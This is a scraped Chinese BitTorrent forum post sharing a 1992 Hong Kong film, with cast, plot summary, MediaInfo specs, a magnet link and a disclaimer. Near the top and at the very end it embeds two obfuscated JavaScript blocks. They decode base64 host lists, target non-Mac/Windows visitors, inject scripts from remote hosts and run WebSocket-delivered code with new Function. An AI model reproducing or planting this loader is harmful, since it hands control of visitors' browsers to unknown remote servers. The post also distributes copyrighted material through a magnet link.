现代应召女郎[国粤语配音/中文字幕].Girls.Without.Tomorrow.1992.1080p.BluRay.x265.10bit.DTS.2Audio 6.02GB

版主小s 1月前 1055

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 现代应召女郎 / 应召女郎1988之二:现代应召女郎 / Girls Without Tomorrow

◎年 代 1992

◎产 地 中国香港

◎类 别 爱情

◎语 言 粤语

◎上映日期 1992-07-30(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0105856/

◎豆瓣评分 7.3/10 (3126人评价)

◎豆瓣链接 https://movie.douban.com/subject/1303979/

◎片 长 100 分钟

◎导 演 黄志 Chi Wong (id:1408663)

林德禄 David Lam (id:1326068)

◎编 剧 黄志 Chi Wong (id:1408663)

苏文星 Man Sing So (id:1360361)

◎演 员 刘嘉玲 Carina Lau (id:1036905)

冯宝宝 Bo-Bo Fung (id:1275994)

罗美薇 May Lo Mei-Mei (id:1116805)

周慧敏 Vivian Chow (id:1042375)

陈宝莲 Pauline Chan (id:1018766)

许志安 Andy Hui Chi-On (id:1107142)

李子雄 Waise Lee (id:1037662)

郑伊健 Ekin Cheng (id:1031793)

吴启明 Kai-Ming Ng (id:1315172)

程东 John Ching Tung (id:1316720)

周志辉 Chi-Fai Chow (id:1343510)

沈威 Wai Shum (id:1297537)

翁世杰 Sai-Kit Yung (id:1319534)

潘震伟 Tom Poon (id:1324952)

韩义生 Yee Sang Hon (id:1341964)

刘兆铭 Lau Siu Ming (id:1313719)

徐忠信 Alan Chui Chung San (id:1327646)

梁锦荣 Kam Wing Leung (id:1377484)

冯瑞珍 Sui Chun Fung (id:1349228)

承恩 En Chreng (id:1434650)

冯峰 Fung Fung (id:1349221)

张凤妮 Betsy Cheung (id:1319440)

林富伟 Fu-wai Lam (id:1433957)

陈文妤 Man-Hiu Chan (id:1418360)

麦克·里德 Mike Leeder (id:1382791)

杨允敬 Wan King Yeung (id:1409229)

黄金棠 Kam-Tong Wong (id:1410167)

丁家强 Michael Dingo (id:1415763)

雷楚雄 Bill Lui (id:1290436)

苏文星 Man Sing So (id:1360361)

周锦祥 Gam Cheung Chow (id:1315803)

◎标 签 香港 / 香港电影 / 周慧敏 / 刘嘉玲 / 情色 / 陈宝莲 / 罗美薇 / 1992

◎简 介

红姐(冯宝宝饰)是受人爱戴的鸨母,为人四海豪迈,生平唯一的遗憾是她的女儿小玲(周慧敏饰)-电视红星方小玲因歧视其母而不愿和她相认,但讽刺的是-小玲为巩固自己的地位,不惜向有关人士出卖肉体。后在一次火灾中,红姐为救女儿身受重伤,生命垂危。红姐有一义女叫华女(刘嘉玲饰),在夜总会当小姐,因故与经理起冲突遂愤而辞职,赋闲其间在红姐处养伤,对小玲势利的态度甚为不满,二人势同水火。红姐在拉客时遇见阿玉(罗美薇饰),阿玉为完成到国外念书的心愿而接客,红姐劝其回头,但其心意已坚无法说服。绮华(陈宝莲饰)与医生男友阿海(李子雄饰)是青梅竹马,绮华为阿海下海当小姐,而阿海却与另一女医生发生感情,绮华伤心至极……

◎获奖情况 (共1项)

第29届台北金马影展 (1992)

金马奖 最佳女配角(提名)

└──罗美薇 (id:1116805)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 231046611293867537554899993759278189583 (0xADD1F56EEFBAA1BD24E7D83708E04C0F)

  4. Complete name : Girls[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.02 GiB

  8. Duration : 1 h 39 min

  9. Overall bit rate : 8 672 kb/s

  10. Encoded date : UTC 2021-10-15 10:41:07

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 39 min

  20. Bit rate : 5 593 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.112

  30. Stream size : 3.88 GiB (64%)

  31. Writing library : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=23.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.60 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 39 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 510 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.05 GiB (17%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No


  55. Audio #2

  56. ID : 3

  57. Format : DTS

  58. Format/Info : Digital Theater Systems

  59. Codec ID : A_DTS

  60. Duration : 1 h 39 min

  61. Bit rate mode : Constant

  62. Bit rate : 1 510 kb/s

  63. Channel(s) : 6 channels

  64. Channel layout : C L R Ls Rs LFE

  65. Sampling rate : 48.0 kHz

  66. Frame rate : 93.750 FPS (512 SPF)

  67. Bit depth : 24 bits

  68. Compression mode : Lossy

  69. Stream size : 1.05 GiB (17%)

  70. Title : Mandarin

  71. Language : Chinese

  72. Default : No

  73. Forced : No


  74. Text #1

  75. ID : 4

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 36 min

  81. Bit rate : 42.9 kb/s

  82. Count of elements : 2667

  83. Stream size : 29.5 MiB (0%)

  84. Title : cht

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Text #2

  89. ID : 5

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 1 h 36 min

  95. Bit rate : 39.8 kb/s

  96. Count of elements : 2667

  97. Stream size : 27.4 MiB (0%)

  98. Title : chs

  99. Language : Chinese

  100. Default : Yes

  101. Forced : No


  102. Text #3

  103. ID : 6

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 36 min

  109. Bit rate : 37.9 kb/s

  110. Count of elements : 2653

  111. Stream size : 26.0 MiB (0%)

  112. Title : eng

  113. Language : English

  114. Default : No

  115. Forced : No


  116. Menu

  117. 00:00:00.000 : :第 01 章

  118. 00:08:13.250 : :第 02 章

  119. 00:15:55.292 : :第 03 章

  120. 00:24:05.583 : :第 04 章

  121. 00:35:11.667 : :第 05 章

  122. 00:44:52.667 : :第 06 章

  123. 00:52:15.792 : :第 07 章

  124. 01:01:28.750 : :第 08 章

  125. 01:08:34.292 : :第 09 章

  126. 01:17:48.958 : :第 10 章

  127. 01:24:54.708 : :第 11 章

  128. 01:34:11.458 : :第 12 章




复制代码


TAGS 爱情

磁力链:
  • magnet:?xt=urn:btih:F00B04DBDD9D58C49D8D239DE0BA2AA5CF015BF9

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (1)
  • Leon612 1月前
    2
    啥也不说了,感谢楼主分享哇!

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};